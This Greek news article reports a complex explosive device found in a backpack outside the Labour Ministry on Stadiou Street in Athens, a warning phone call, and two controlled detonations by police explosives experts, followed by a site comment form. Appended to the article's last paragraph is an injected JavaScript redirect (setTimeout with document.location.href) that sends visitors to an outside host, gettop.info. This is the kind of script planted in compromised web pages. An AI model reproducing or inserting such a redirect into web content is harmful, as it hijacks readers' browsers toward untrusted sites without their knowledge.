Εξουδετέρωσαν βόμβα στο υπουργείο Εργασίας – Δύο ελεγχόμενες εκρήξεις

0
40

 

Πολύπλοκο εκρηκτικό μηχανισμό τοποθέτησαν σε σκίδιο πλάτης σε κάγκελο της εσοχής στο πεζοδρόμιο μπροστά από την είσοδο του υπουργείου Εργασίας στη Σταδίου.

Ο μηχανισμός δεν εξερράγη ενώ προηγήθηκε τηλεφώνημα στην «Εφημερίδα των Συντακτών». Πυροτεχνουργοί του ΤΕΕΜ, αφού πέρασε το διάστημα των 40΄το οποίο είχε δώσει ο άγνωστος που έκανε το προειδοποιητικό τηλεφώνημα, προχώρησαν διαδοχικά από τις 4.30 περίπου τη νύχτα, σε δύο ελεγχόμενες εκρήξεις για τη διάσπαση του εκρηκτικού μηχανισμού. Επρόκειτο για πολύπλοκο εκρηκτικό μηανισμό όπως σημείωσε ο υφυπουργός Εργασίας Τάσος Πετρόπουλος μιλώντας στην πρωινή εκπομπή του ΑΝΤ1 ενώ το προειδοιθητικό τηλεφώνημα σημειώθηκε γύρω στη 1,20 τα ξημερώματα.

Η οδός Σταδίου παρέμεινε κλειστή αρκετές ώρες καθώς ειδικοί του ΤΕΕΜ και της Εγκληματολογικής Υπηρεσίας αλλά και της Αντιτρομοκρατικής συνέλεγαν τα υπολείμματα τα οποία θα «δείξουν» το είδος και τη συνδεσμολογία του εκρηκτικού μηχανισμού, ενώ δόθηκε στην κυκλοφορία λίγα λεπτά πριν από τις 9.00. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here